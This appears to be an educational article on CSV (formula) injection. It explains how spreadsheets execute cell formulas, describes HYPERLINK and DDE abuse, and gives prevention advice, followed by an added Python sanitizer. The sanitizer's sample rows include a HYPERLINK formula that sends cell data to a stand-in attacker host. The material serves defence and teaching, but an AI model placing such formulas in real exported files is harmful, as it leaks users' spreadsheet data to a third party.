CSV Injection



What is a CSV file?

A CSV (Comma Separated Value) file stores tabular data in plain text. Each record consists of one or more fields separated by commas. CSVs look like a garden-variety spreadsheet but with a .csv extension. CSV files can be opened with almost any spreadsheet program, such as Microsoft Excel or Google Spreadsheets.



What is CSV Injection?

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Such input can be maliciously crafted to break the data/code barrier in spreadsheet software and result in unintended command and program execution.

Whenever Excel or LibreOffice Calc is used to open a CSV file, any cell which starts with "=" is interpreted as a formula by the software.

Here is an example that multiplies two values with the help of a built-in function.



You might wonder how such simple functions can be dangerous to the targeted system. The problem lies in how the software processes a CSV file: it first parses and evaluates the formulas which begin with "=" before it displays any content to the user. These formulas may contain a call to a system function or a malicious payload which can exploit the victim's system or leak the data.



How does this affect the user?

CSV Injection can affect the user in the following ways:

First, the user can click on a hyperlink present inside the spreadsheet. The hyperlink is created with the help of "=". On clicking the link, the user can be made to open any link or file residing on the attacker's server. The attacker will also be able to steal the data available in the spreadsheet.

Also, the formula can be executed as soon as the spreadsheet is opened. This way the user has no control over it and the execution cannot be stopped. Any program can be opened by the attacker at will. This can also result in a DoS attack that consumes the user's system resources by opening CMD with the help of the function.


Examples:

We can create a hyperlink function which creates a shortcut or jump that opens a document stored on a network server, an intranet, or the Internet. When you click the cell that contains the hyperlink function, MS Excel opens the file that is stored at the link location.

The following is an example where we have linked Google to the website. Similarly, an attacker can link some malicious site and send private data along with the request.




We can also use a basic exploit with Dynamic Data Exchange. Dynamic Data Exchange (DDE) is an inter-process communication system which allows data to be communicated or shared between applications on operating systems such as Windows. Dynamic Data Exchange makes use of shared memory and a set of commands, message formats and protocols for communication and sharing.

The following is an example that opens Notepad. In the same way, an attacker can run malicious commands with the help of CMD.

To guard against this, Excel shows a warning:



How to prevent it?

It is the responsibility of the spreadsheet applications to prevent such attacks. However, web applications can take a stand and refuse any values starting with the special characters mentioned above. In order to prevent such an injection, the application can prepend a single quote (') to the cell on detecting such a vulnerable value, so the spreadsheet treats it as literal text.

LibreOffice does it in the following way:




It can be seen that "|" was converted into ";", so we got an error and the command didn't execute.

Conclusion

CSV injection is a dangerous and often overlooked attack vector that can have devastating effects on people, regardless of where the attack takes place. For the formula to execute successfully, the attacker has to use '-', '=' and the pipe (|); the pipe is what makes Excel execute the binary. Hence, it is strongly recommended to filter '-', '|', '+' and '=' to mitigate this vulnerability. Also, since this attack is difficult to mitigate, it is excluded from the scope of quite a few bug bounty programs.
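As an added example, not code from the original post, the following Python sanitizer applies the prevention described in the "How to prevent it?" section together with the character list from the conclusion: it prepends a single quote to any cell that begins with a formula trigger and serialises the rows with the standard csv module so embedded commas and quotes cannot break the record structure. The '@', tab and carriage-return triggers, the function names and the sample rows are my own assumptions, not something the post states.

```python
import csv
import io

# Leading characters that Excel / LibreOffice Calc treat as the start of a
# formula. '=', '+' and '-' come from the post; '@' (Lotus-style formula),
# tab and carriage return are added here from common hardening guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if the cell would be parsed as a formula when opened in a spreadsheet."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Prefix a single quote so the spreadsheet shows the value as literal text.

    Non-string values (numbers, None) are stringified; a negative number such
    as -3 starts with '-' and therefore also gets the prefix, which is the
    price of a conservative filter."""
    text = "" if value is None else str(value)
    if is_formula_like(text):
        return "'" + text
    return text


def rows_to_csv(rows) -> str:
    """Serialise rows of untrusted values into CSV text with every cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample: a comment export where two users submitted formulas,
# one of them a HYPERLINK that would leak a neighbouring cell's contents.
SAMPLE_ROWS = [
    ["user", "comment"],
    ["alice", "Great product, 5/5"],
    ["mallory", "=2*3"],
    ["eve", '=HYPERLINK("https://attacker.example/?d="&A2,"click")'],
]

if __name__ == "__main__":
    print(rows_to_csv(SAMPLE_ROWS))
```

Because the csv module doubles any embedded quote, the prefixed single quote survives a round trip through csv.reader and the spreadsheet shows the original text instead of evaluating it.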
